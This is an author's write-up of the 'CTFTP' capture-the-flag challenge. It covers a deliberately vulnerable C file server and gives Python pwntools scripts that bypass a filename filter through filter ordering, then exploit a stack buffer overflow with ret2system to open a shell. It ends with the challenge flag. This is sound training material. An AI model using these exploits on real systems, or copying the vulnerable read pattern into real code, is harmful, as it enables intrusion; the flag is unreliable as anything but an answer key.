# CTFTP Author Writeup

## Description

Just what the world needs... another vulnerable FTP server. Have fun.

**Hint:** Can you figure out the filter order?

## A Word From The Author

Alright so, I screwed up... The intent for this challenge was this:

1. They aren't given the binary and are supposed to figure out how to "get it" by leaking it remotely
2. Pwn the binary

I screwed up because the binary was uploaded to CTFd which cut all the fun out of this challenge and made it another lame buffer overflow. Ugh! It was frustrating to find that out. I'm still going to explain this challenge as if I set it up correctly.

This was the directory listing on the remote server:

``` sh
├── ctftp
├── firefox.png
├── flags
│   └── flag.txt
├── gitlab.png
├── lorem.txt
├── rockyou.zip
├── stack_smashing.pdf
└── usernames.txt
```

* `ctftp` is the binary
* the `flags` directory must be created and `flag.txt` must be put inside
* all other files shows are in the `files` directory


## Information Gathering

```c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time
#include <sys/types.h>

// List of restricted files to not be downloaded
char *rfiles[1] = {
	"ctftp"
};

// Get to know your users
char username[32];

int menu() {
	printf("\nChoose a command:\n1) List Files\n2) Get Files\n");
	printf("> ");
	int mval = 0;
	scanf("%d", &mval);

	return mval;
}

// Gets the filesize of a file
// https://stackoverflow.com/questions/238603/how-can-i-get-a-files-size-in-c
int fsize(FILE *fp){
    int prev=ftell(fp);
    fseek(fp, 0L, SEEK_END);
    int sz=ftell(fp);
    fseek(fp,prev,SEEK_SET); //go back to where we were
    return sz;
}

// Doesn't copy naughty characters
void filter(char *filename, int len) {
	char *filt = malloc(64);
	memset(filt, 0, 64);

	// remove: / \ , : ; `
	for (int i = 0, j = 0; i < len; i++) {
		char c = filename[i];
		if (c != '/' && c != '\\' && c != ',' && c != ':' && c != ';' && c != '`' && c != '\n') {
			filt[j] = c; j++;
		}
	}

	memcpy(filename, filt, 64);
	free(filt);
}

// the equivalent of .contains()
// Found somewhere on the internet
int match(char text[], char pattern[]) {
	int c, d, e, text_length, pattern_length, position = -1;
	text_length    = strlen(text);
	pattern_length = strlen(pattern);
	if (pattern_length > text_length)
		return -1;
	for (c = 0; c <= text_length - pattern_length; c++) {
		position = e = c;
		for (d = 0; d < pattern_length; d++) {
			if (pattern[d] == text[e])
				e++;
			else break;
		}
		if (d == pattern_length)
			return position;
	}
	return -1;
}

// Checks for restricted files
int restrictedFiles(char *filename) {
	int len = sizeof(rfiles)/sizeof(rfiles[0]);
	for (int i = 0; i < len; i++) {
		char *rfile = rfiles[i];
		int pos = match(filename, rfile);
		if (pos != -1) {
			printf("Nice try dirty hacker!\nYou're not getting '%s' anytime soon.\n", filename);
			return 1;
		}
	}
	return 0;
}

// Checks to make sure the file exists and is readable
int checkFile(char *filename) {
	// Does the file exist
	if( access(filename, F_OK) == -1 ) {
		printf("File not found: '%s'\n", filename);
		return 1;
	}
	// Can we read the file
	FILE *fp = fopen(filename, "r");
	if (fp == NULL) {
		printf("Permissions denied: '%s'\n", filename);
		return 1;
	}

	return 0;
}

// Sends the file over the wire
// also: https://stackoverflow.com/questions/28197649/reading-binary-file-in-c-in-chunks
void sendFile(char *filename) {
	// Format when sending data
	// length:data

	FILE *file = NULL;
	unsigned char *buffer = malloc(1024);  // array of bytes, not pointers-to-bytes
	size_t bytesRead = 0;

	file = fopen(filename, "rb");

	if (file != NULL) {
		// Send the formatted length
		printf("%d:", fsize(file));
		// read up to sizeof(buffer) bytes
		while ((bytesRead = fread(buffer, 1, 1024, file)) > 0) {
			write(1, buffer, bytesRead);
		}
	}
	free(buffer);
}

// Request to download a file (contains buffer overflow)
void get() {
	// Get input
	printf("Enter filename: ");
	char filename[64];
	memset(filename, 0, 64);
	int len = read(0, filename, 128); // BOF

	// Prevent restricted files
	if (restrictedFiles(filename)) return;

	// CTF-style input filter
	filter(filename, len);

	// Checks the file exists, and we have permissions
	if (checkFile(filename)) return;
	
	printf("Sending File: %s\n", filename);
	sendFile(filename);
}

void welcome() {
	printf("Welcome to the CTFTP: the netcat-based FTP server\n");
	printf("Enter your name: ");
	scanf("%32s", username);
	printf("Welcome %s, feel free to browse my wares\n", username);
}


int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	welcome();

	while (1) {
		int m = menu();
		switch (m) {
			// ls
			case 1:
				system("ls"); break;
			// get
			case 2:
				get(); break;
			default:
				puts("Please enter a valid number"); break;
		}
	}

    return 0;
}
```

![info.png](./imgs/924b093e612d4477b5a4bb5676d5da9a.png)

We can see that we can connect and retrieve files. The file we retrieved was *lorem.txt*. From the data we received we can see that the file is 446 bytes, just like the first bytes sent back before the semicolon. Let's see what other data we can get outta of this.

![fuzz.png](./imgs/f18f0cacdf6e453daa7e45456b09884b.png)

Cool. So we can access files noramlly, but as we can see from the `filter()` function in the C code, naughty characters are removed and we are unable to traverse directories or inject commands (always gotta try, even on your own chals). Okay so if we can't traverse anywhere else, let's see if we can' leak the binary shall we...

![attempt0.png](./imgs/b29d8d301b09473bb216bcf72d08202b.png)

Interesting... So we can retrieve normal files but not the `ctftp` binary. Even more interesting, is that the newline isn't removed when it tells us what file we can't access. If you recall, when retrieving a file normally it will tell us what file is being sent without any problems. Maybe this isn't an issue but rather something we can exploit. If we follow this assumption we should fuzz the binary more and see if we can figure it out.


![attempt1.png](./imgs/18ee1c543bc64e58a30184809de1440e.png)

Ahh, we are getting closer. We can see that since `/` is filtered out we can't access normal files with the standard `./filename`. BUT when we try and access **ctftp** again with same format, the `/` isn't filtered out. This gives us an insight into the order of how the get() method accesses files. You'd expect an FTP server to restrict access to files, perform some filter to sanitize user input, and check to make sure the file exists and you can access it, but not necessarily in that order. Since the filter comes **after** the check against restricted files, we can abuse this fact to leak the binary.

Here's the flow: \
`ctf\tp` → **restrictedFiles()** → `ctf\tp` → **filter()** → `ctftp` → **checkFile()** → **sendFile()**

![success.png](./imgs/f50af78b434b47c3a34d3b0cc9d836fc.png)

Perfect. Lets write a script to leak it.

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'localhost 5050',
    localcmd =  './ctftp',
#    libcid =    '',
#    libcfile =  './',
#    local =     True,
    pause =     True,
    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
f = 'ctftp'

# get file
p.sendline('/bin/sh')
p.sendline('2')
# Commented out so we can send a a slightly different input
#p.sendline(f)
p.sendline('ctf\\tp')

p.recvuntil('Sending File: '+f+'\n')
toread = int(p.recvuntil(':')[:-1])

# Append to the file locally (the leaked data)
with open(f, 'a') as binary:
    while True:
        r = p.recv()
        rlen = len(r)

        if toread > rlen:
            binary.write(r)
            toread -= rlen
        else:
            binary.write(r[:toread])
            exit(0)


#___________________________________________________________________________________________________
pwnend(p, args)
```

## Exploitation

Now that we've leaked the binary, we can analyze it and find the exploit. Being the author I can read the C code and see that there is a buffer overflow in the `get()` function (cheating, I know). Since the binary doesn't have **P**osition **I**ndependent **E**xecution we can jump anywhere with a simple buffer overflow... now, where shall we go. A quick check shows that `system()` is called in the original binary so instead of leaking, or shellcode, or some other third thing, we can perform a ret2system().

A ret2system() is all well and good unless you have an known address you can write to. Thankfully for us, this binary asked our name, goodie let's use that. When prompted for a name, enter `/bin/sh`, then move to the 'Get Files' section and ROP to system, simple. Let's script it up.

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30500',
    localcmd =  './ctftp',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
    pause =     True,
    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
pad = 76
# the 'username' stored in .data. Used later for a call to system()
p.sendline('/bin/sh')
# "get file"
p.sendline('2')
#p.recv()

# Alternate Solution (not used)
#printfGOT = flat(elf.got['printf'])
# 'call puts' in welcome()
#printfleak = flat(elf.sym['welcome']+23)

# 'username' variable in .data
username = flat(elf.sym['username'])
callsystem = flat(elf.plt['system'])

payload = ''
payload += "A"*pad
payload += callsystem
payload += 'RETN'
payload += username

p.sendline(payload)
p.interactive()
#___________________________________________________________________________________________________
pwnend(p, args)
```

![flag.png](./imgs/f2e7e7845cdf4b64bbf6e79325090c4a.png)


## Endgame

The point here was that you needed a shell to get into the **flags** directory and steal the flag. Sadly this challenge will never be solved as intended. But hopefully it will still be appreciated just as much. Thanks for playing.

> **flag:** TUCTF{f1l73r_f1r57_7h3y_541d._y0u'll_b3_53cur3_7h3y_541d}

